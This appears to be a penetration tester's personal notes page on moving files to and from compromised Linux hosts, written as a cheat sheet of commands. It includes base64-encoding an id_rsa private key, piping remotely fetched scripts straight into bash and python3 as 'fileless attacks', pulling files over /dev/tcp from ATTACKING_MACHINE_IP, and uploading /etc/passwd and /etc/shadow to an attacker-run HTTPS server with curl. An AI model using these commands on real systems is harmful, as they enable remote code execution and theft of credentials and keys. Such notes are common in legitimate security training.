Monty's Pentesting Notes | Obsidian

    Linux File Transfer

    Although Linux can communicate via FTP, SMB like Windows, most malware on all different operating systems uses HTTP and HTTPS for communication.

    Table of Contents

    Base64 Copy and Paste

    check hash

    md5sum id_rsa

    encode

    cat id_rsa |base64 -w 0;echo

    decode on target machine

    echo -n 'the base64 string' | base64 -d > id_rsa

    confirm hash

    md5sum id_rsa

    Wget and cURL

    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

    curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    from our attacking to target
    start server on our end

    python3 -m http.server

    request on target machine

    wget http://10.10.15.142:8000/logrotate.c -O logrotate.c

    Fileless attacks

    pipe allows to execute file without download
    bash script

    curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

    python script

    wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

    Bash Downloads

    bash version >= 2.04, use built in /dev/TCP

    on the attacking machine, set up lisenting server

    python3 -m http.server 80

    connect to target web server

    exec 3<>/dev/tcp/ATTACKING_MACHINE_IP/80

    HTTP get request

    echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

    print the response

    cat <&3

    SSH/SCP Downloads

    set up SSH server on attacking machine

    sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt

    Download the file on target machine

    scp plaintext@192.168.49.128:/root/myroot.txt .

    Note: You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

    Python Web Uploads

    On attacking machine, install server

    python3 -m pip install uploadserver

    create a self-signed certificate

    openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

    start web server

    mkdir https && cd https

    python3 -m uploadserver 443 --server-certificate /home/mont/Desktop/server.pem

    upload to the listening server on our target machine

    curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

    SCP Uploads

    set up SSH server on target machine

    sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt

    Download the file on attacking machine

    scp plaintext@192.168.49.128:/root/myroot.txt .

    Different ways of creating web servers in Linux

    python3

    python3 -m http.server

    python2.7

    python2.7 -m SimpleHTTPServer

    php

    php -S 0.0.0.0:8000

    ruby

    ruby -run -ehttpd . -p8000

    download

    wget 192.168.49.128:8000/filetotransfer.txt